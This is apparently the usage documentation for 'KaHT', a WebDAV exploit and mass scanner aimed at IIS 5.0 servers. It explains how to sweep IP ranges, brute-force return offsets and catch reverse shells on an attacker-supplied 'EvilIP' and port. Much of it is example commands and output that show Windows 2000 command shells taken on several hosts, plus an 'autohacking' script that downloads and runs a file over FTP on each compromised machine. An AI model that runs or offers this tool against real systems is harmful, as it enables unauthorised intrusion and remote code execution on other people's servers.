Features:

- Brute Force offset ip/range.
- Ip list Support: (plain text , Ehhtps or uhhuhy Httpb v1.0 logfile)
- Handles Incoming Conections. (Manual and AUtohacking support). 
- HTML Report Generator.
- Included an Http Banner Scanner (EHTTPS only for windows)


Usage: KaHT.exe EvilIP EvilPort AUTOHACKING [IP |-filename] [OFFSET]

EvilIP: Your Ip Address. shellcode will be sent to your HOST.
Evilport: Your Port. shellcode will be sent to your port
Autohacking= 0 --> give you a shell.  1 --> when incoming conection an script file (requests.txt) will be send.
ip: 192.168.1.56 --> scans a single HOST.
ip: 192.168.1.255 -> Scans from 192.168.1.0 to 192.168.1.255
Filename: -c:\iplog.txt (scan ips from that file)
OFFSET: 0xd8 --> scans and try to Hack all the hosts only with this offset.

examples:
---------

------------------------------------------------------------------------------
C:\exploit\lcc>KaHT.exe 192.168.0.1 53 0 192.168.1.100
(attack 192.168.1.100 and if succesfull will spawn a shell con 192.168.0.1 port 53)

 . .. ...: Webdav exploit & Scanner (aT4r@3wdesign.es) :... ...

 Checking Servers.   IP                 Connect IIS 5.0 WEBDAV
 Connecting to host: 192.168.1.100...   [OK]    [OK]    [OK]
 [+] Aceptando conexiones en el puerto 53
 [+] Lets go dude =)
 [+] 1 Unhacked Servers Remaining
 [+] Trying Ip: 192.168.1.100      Ret=0x00c000c0
 [+] Trying Ip: 192.168.1.100      Ret=0x00c200c2
 [+] Incoming Conection from 192.168.1.100 accepted
 [+] Press Enter to Continue. type "exit" to return to scan
Microsoft Windows 2000 [Versin 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

------------------------------------------------------------------------------------

C:\exploit\lcc>KaHT.exe 192.168.0.1 53 0 192.168.1.255
(attack 192.168.1.xxx and if succesfull will spawn a shell con 192.168.0.1 port 53)

 . .. ...: Webdav exploit & Scanner (aT4r@3wdesign.es) :... ...

 Checking Servers.   IP                 Connect IIS 5.0 WEBDAV
 Connecting to host: 192.168.1.1... 	  [OK]    [OK]    [OK]
 Connecting to host: 192.168.1.2... 	  [OK]    [OK]    [OK]
 Connecting to host: 192.168.1.3... 	  [OK]    [OK]    [OK]
 Connecting to host: 192.168.1.4... 	  [OK]    [OK]    [FAILED]
 Connecting to host: 192.168.1.5... 	  [OK]    [OK]    [OK]
 Connecting to host: 192.168.1.6... 	  [OK]    [OK]    [OK]
 Connecting to host: 192.168.1.7... 	  [FAILED] To connect
 Connecting to host: 192.168.1.8... 	  [OK]    [OK]    [OK]
.....
 [+] Aceptando conexiones en el puerto 53
 [+] Lets go dude =)
 [+] 1 Unhacked Servers Remaining
 [+] Trying Ip: 192.168.1.1      Ret=0x00c000c0
 [+] Trying Ip: 192.168.1.2      Ret=0x00c000c0
 [+] Trying Ip: 192.168.1.3      Ret=0x00c000c0
 [+] Incoming Conection from 192.168.1.3 accepted
 [+] Press Enter to Continue. type "exit" to return to scan
Microsoft Windows 2000 [Versin 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
....
D:\>exit
 [+] Trying Ip: 192.168.1.5      Ret=0x00c000c0
 [+] Trying Ip: 192.168.1.6      Ret=0x00c000c0
 [+] Trying Ip: 192.168.1.8      Ret=0x00c000c0


------------------------------------------------------------------------------------


C:\exploit\lcc>KaHT.exe 192.168.0.1 53 0 -c:\ips.txt
(attack ips.txt and if succesfull will spawn a shell con 192.168.0.1 port 53)

 . .. ...: Webdav exploit & Scanner (aT4r@3wdesign.es) :... ...

 Checking Servers.   IP                 Connect IIS 5.0 WEBDAV
 Connecting to host: 192.168.1.100...   [OK]    [OK]    [OK]
 Connecting to host: 192.168.1.101...   [OK]    [OK]    [OK]
 Connecting to host: 192.168.1.104...   [OK]    [FAILED]
 Connecting to host: 192.168.1.123...   [OK]    [OK]    [FAILED]
 Connecting to host: 192.168.1.138...   [OK]    [OK]    [OK]

 [+] Aceptando conexiones en el puerto 53
 [+] Lets go dude =)
 [+] 3 Unhacked Servers Remaining
 [+] Trying Ip: 192.168.1.100      Ret=0x00c000c0
 [+] Trying Ip: 192.168.1.101      Ret=0x00c000c0
 [+] Trying Ip: 192.168.1.123      Ret=0x00c000c0
 [+] Trying Ip: 192.168.1.100      Ret=0x00c200c2
 [+] Incoming Conection from 192.168.1.100 accepted
 [+] Press Enter to Continue. type "exit" to return to scan
Microsoft Windows 2000 [Versin 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
.....
C:\WINNT\system32>exit
 [+] 2 Unhacked Servers Remaining
 [+] Trying Ip: 192.168.1.101      Ret=0x00c200c2
 [+] Trying Ip: 192.168.1.123      Ret=0x00c200c2
....

------------------------------------------------------------------------------------
C:\exploit\lcc>KaHT.exe 192.168.0.1 53 0 192.168.1.100 0xd6
uses only one RET=0x00d600d6 for all the servers

------------------------------------------------------------------------------------


IF autohacking is ENABLED when a new incoming conection is accepted scan will continue and the content of a file called requests.txt will be send.

Here is an example of requests.txt
echo open ftp.microsoft.com>a
echo ftp>a
echo a@>>a
echo bin>>a
echo get webdav_HOTFIX.exe>>a
echo bye>>a
ftp -a:a
webdav_HOTFIX.exe /install
del a
net send localhost Vunerable SERVER PATCHED. Please Reboot NOW.
exit


------------------------------------------------------------------------------------


Gracias a Drakar, [back], Tarako y Croulder ;***
